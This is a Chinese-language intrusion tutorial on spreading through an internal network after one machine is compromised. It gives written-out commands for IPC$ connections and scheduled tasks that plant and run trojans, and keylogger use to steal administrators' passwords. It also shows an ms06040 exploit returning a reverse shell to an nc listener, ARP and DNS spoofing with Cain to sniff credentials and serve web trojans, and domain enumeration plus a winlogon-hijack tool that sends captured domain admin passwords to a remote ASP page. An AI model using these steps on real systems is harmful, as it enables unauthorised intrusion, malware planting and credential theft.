1、有了内网一台机器了,当然要继续渗透下去,在这里我总结一下几种方法,方法一、扫描弱口令,ipc$连接。方法二、靠自己的运气和管理员的懒惰加社会工程学。方法三、溢出。方法四、arp欺骗,dns欺骗。方法五、域结构下的渗透


方法一、扫描弱口令,ipc$连接

xscan-v3.3扫描器扫一下内网

ipc 是internet process connection的缩写,也就是远程网络连接。windowsnt/2000/xp/2003默认都提供了ipc$管道连接,

ipc$连接需满足两个条件:

1、目标主机开启了ipc$共享 ;
2、拥有目标主机的管理员帐号和密码 。

cmd下输入:
       net use \\ip\ipc$ "password" /user:"username" 建立非空连接
接着       copy \路径\*.exe \\ip\共享目录名,向远程主机复制文件
接着       net time \\ip,查看远程主机的当前时间


接着   就可以用计划任务运行我们copy过去的程序了,
执行   at \\ip 时间 程序名

如果对方禁止了计划任务,默认是开启的,我们可以把文件复制到对方启动目录,

先执行net use z: \\ip\c$,是把对方c盘映射到本机z盘上,这样我们直接将安全放在启动目录

等复制完了想断开了可以用命令,net use z: /del /y
如果有朋友也手工输入命令麻烦,也可以用20cn的ipc扫描器,可以同步植入安全

在域控的环境中,我们只要得到域控密码就可以直接用ipc连接管理员机器种马。

------------------------------------------------------------------------------------------

方法二、靠自己的运气和管理员的懒惰加社会工程学。(推荐非安全出的安全社会工程学攻击一书)

1.管理员为了方便设置“密码一卡通”用破出来的本机密码连接所有开3389的机器


2.可以在本机装上键盘记录,安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,web网页密码等等,这样也可以得到管理员的很多信息
键盘记录大师,首先运行keyboardlog.exe,然后点"开起监控",注意这个程序只要运行一次就可以了,以后开机的时候自动运行
我们点击开始监控就可以了。这个工具可以记录中文,这点对于有些机器还是不错的,记录的文件可以设置,方法为修改config.ini里的文件. 格式为如 c:\1111.txt,然后再运行keyboardlog.exe,点击停止监控,然后再重新点开始监控。

-----------------------------------------------------------
方法三、内网溢出。

溢出从技术角度可以分为:  堆溢出
                          栈溢出


先不说,从另一个角度则分为远程(remote)溢出和本地(local)溢出

远程溢出也就是通过对方的一些网络上的服务对我们提交的的数据没有严格的检查,我们提交一些精心构造的数据,可以迫使对方的主机执行我们指定的动作:比如添加用户,打开端口,反弹一个shell给我们等等。


superscan3.0扫描内网开放445端口

 

在本机用nc监听1234端口,执行nc -l -v -p 1234

 

然后用另一个cmd窗口执行,ms06040rpc 对方ip 本机ip 1234 1

 

样用nc监听的端口会返回了对方的cmdshell

dns服务一般开放53端口


-----------------------------------------

方法四、arp欺骗,dns欺骗。


2、什么是arp?
,大家都知道计算机通信是要有ip地址的吧!可是在局域网中,计算机之间的通信是只靠mac地址来发送数据的。arp是一种协议,用来实现ip地址到mac地址的转换,假设192.168.1.1要发一个数据给192.168.1.101,它就会发出arp广播包问:“谁是192.168.1.101?我要你的mac地址!”这时候192.168.1.101会回答:“我是192.168.1.101,我的mac是aa-aa-aa-aa-aa-aa。”然后192.168.1.1就会把这个回答记录下来,然后再发数据给192.168.1.101的时候就直接构造目地地址为aa-aa-aa-aa-aa-aa的数据包发送。


3、什么是arp欺骗?
、经过刚才的arp查询的过程我们知道,在询问的过程中,国为不知道到底谁才是192.168.1.101,所以192.168.1.1发出的是广播包来询问,其它的电话虽然也收到了这个包但是并不回答。假如现在有个人,192.168.1.102居心不良,想冒充192.168.1.101,他也可以给192.168.1.1发一个回答的数据包说:“我才是192.168.1.101,我的mac地址是bb-bb-bb-bb-bb。”那么192.168.1.1就会把原先的那条记录从mac地址表中删除掉,写入新的这个地址对应关系,这就是arp欺骗

 


4、什么是网关?
、在局域网中,所有的电脑可能是共用一个网络出口,这个出口就是网关了。网关可以是一台电脑,也可以是一个路由器的某个接口,它一样有自己的ip地址,局域网中所有的要发到外部的数据包都直接递交给网关,网关负责将这个数据包传递到远程网络,再将外界返回的数据分发给局域网中的指定电脑。
tcp/ip协议是如此的脆弱,arp协议在设计的当初并没有充分的考虑到安全问题,所以今天才出现n多的arp欺骗工具,在介绍工具之前,我们再来谈谈服务器在机房中的情况。一般而言,现在流行的的主机托管方式置放的服务器是和很多别的服务器放在一个机柜上,大家共用一个交换机共享100m的带宽,这样就造成了一个问题,那些没有做端口隔离的的机房(绝大多数机房都是这样的)每个交换机下的所有服务器构成一个局域网。在这个局域网下,大家就可以玩arp欺骗了


arp嗅探的工具要先提一下有一定的位置的cain

安装好我们运行cain,点击sniffer,在选择工具栏第二个按钮,在点击十字架,在弹出对话框中我们选择子网中所有计算机


在configure选项里我们可以根据需要选择端口,如21、80、3389等。如图37所示。
这时在选择下面的arp,十字按钮是灰色的,我们点击一下空白处,在选择十字按钮,在弹出的对话框里左边选择网关,右边选择欺骗的ip。最后点开始嗅探,上面第二个按钮

这样就能嗅到数据了

家在用cain嗅探的时候可能遇到过这样的情况,数据一大就当机了,过了很少时间都连不上了,所以这时候就需要我们尽可能把不需要嗅探的端口都去掉。这样会大大的减少当机的可能性。如果看到丢包率超过10%就要注意啦,赶紧停掉,看看那里没设置好吧。另外提供一个“chong”写的bat程序,在开嗅的时候运行它就可以了。

======start=========
:ping
ping g.cn
if errorlevel   1 goto reboot
if errorlevel   0 goto ping
:reboot
iisreset /reboot
======end=========
这里的g.cn你可以设置为网关的ip或你的ip
如果能ping通的话就继续ping 如果不通的话就认为当机了 (事先自己先测试下)。

 

dsn欺骗

下dns是怎样工作的,dns是全称是domain name  server,既域名服务器。
当一台主机发送一个请求要求解析某个域名时,他会首先把解析请求发到自己的dns服务器上。如果内网里的192.168.1.101要访问百度www.baidu.com,但不知道其ip地址,这时192.168.1.101主机询问网关192.168.1.1,www.baidu.com的ip是多少,如果这时候我们将冒充网关192.168.1.1返回给192.168.1.101他一个特定的含有网页安全的ip,这样就实现了dns域名欺骗。


首先用前面的介绍的列出内网机器,然后在arp里选择arp-dns,点击空白处激活十字按钮,弹出一个dns欺骗对话框,在请求dns域名栏中填入对方要访问的网站,如www.baidu.com,然后在用来改写响应的ip地栏,

如果我们在本架设一个http服务器,挂上一个网马后,就能欺骗访问者了,当然如果想做的更像,可以制作一个和欺骗主页一样的页面。


方法五、域结构下的渗透。

什么是域?

域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可了。也就是域用户登录,超级大的权限。而域还可以扩展,像域树,域林。在一个网络中既可以有多个多级子域、域树,还可以有多个林

我这里举个例子,例如一个内网是一个大楼,而每层的每个房间是一台计算机,当然每个房间的钥匙只有房间的主人才拥有,但大楼建立一个保安室,而这保安室为了管理方便有一把可以打开任意房间的钥匙。前题是这个房间允许加入保安的管理范围内,这个保安室就是域控制器,当然在形象的说大楼可以是10层,而每一层都有一个保安室,也可以有一个总的保安室。当然在往大的说也可以有很多大楼,大楼与大楼之间为了方便也可以建立共享。如活动目录的域,活动目录可以贯穿一个或多个域。在独立的计算机上,域即指计算机本身,一个域可以分布在多个物理位置上,同时一个物理位置又可以划分不同网段为不同的域,每个域都有自己的安全策略以及它与其他域的信任关系。当多个域通过信任关系连接起来之后,活动目录可以被多个信任域域共享。

在往回说每台机器像一个树叶,而我们控制了树叶,还想控制树杈,而最后还想控制这个大树,这时候就到域根了。而一棵树是在一片森林当中的。

 

在入侵内网的时候,一般先用net view 查看内网的情况,列出共享的域、计算机或资源的列表


如何判断有没有域呢,其实一个ipconfig /all基本就看出来了

注意一下第二项,也就是primary dns suffix这项,从这个命令我们可以得知,存在一个域xxxx-cc.com,
我们ping一下域xxxx-cc.com,得到域服务器的ip。


或者用命令net config workstation,会显示本机计算机名和管理员用户名,工作站的域dns名称及登录到的域


接着执行net localgroup administrators来看一下本机在域里面的角色

我们再来查看一下域里面有多少的用户,执行net user /domain

再查看一下域管理员有哪些,执行net group "domain admins" /domain


大家知道在域管理网络中只要搞定了域管理员内网一切机器都ok了,现在域服务器有了,域管理员有了。

思路呢?可以用上面的几种方法来入侵域服务器,如arp嗅探域服务器,而域管理器在很多时候也是dns服务器,也可以尝试dns溢出等


思路呢?可以用上面的几种方法来入侵域服务器,如arp嗅探域服务器,而域管理器在很多时候也是dns服务器,也可以尝试dns溢出等。这里我为大家推荐一个winlogon劫持记录3389密码小工具,原作者为“lovemfc”,我们用这个不是记录本机登录的3389密码,当然本机也是可以记录的,更不错的是可以记录域管理员登录本机的密码,因为域管理员是有权限登录下面每台用户的机器的。缺点是记录密码的东西只能保存本机上,而asm根据这个写了一个发信版的生成器,这就方便我们大家了,程序运行后如图50。
winlogon劫持记录的工具

 

 选择好接受的asp地址后,生成出来createserver.exe,直接在服务器上运行即可,post.asp会在你的url地址下生成key.txt。适用范围2003系统,图51

是我记录到本机管理员和域管理员的密码,这下就可以纵横整个内网了。在服务器上扫描开放3389端口的,用域管理员登录全部ok,在域控的环境中,我们只要得到域控密码也可以直接用ipc连接管理员机器种马

 

 

 

 

 

 

 

 

 

 

 


 

版权声明:若无特殊注明,本文皆为( August )原创,转载请保留文章出处。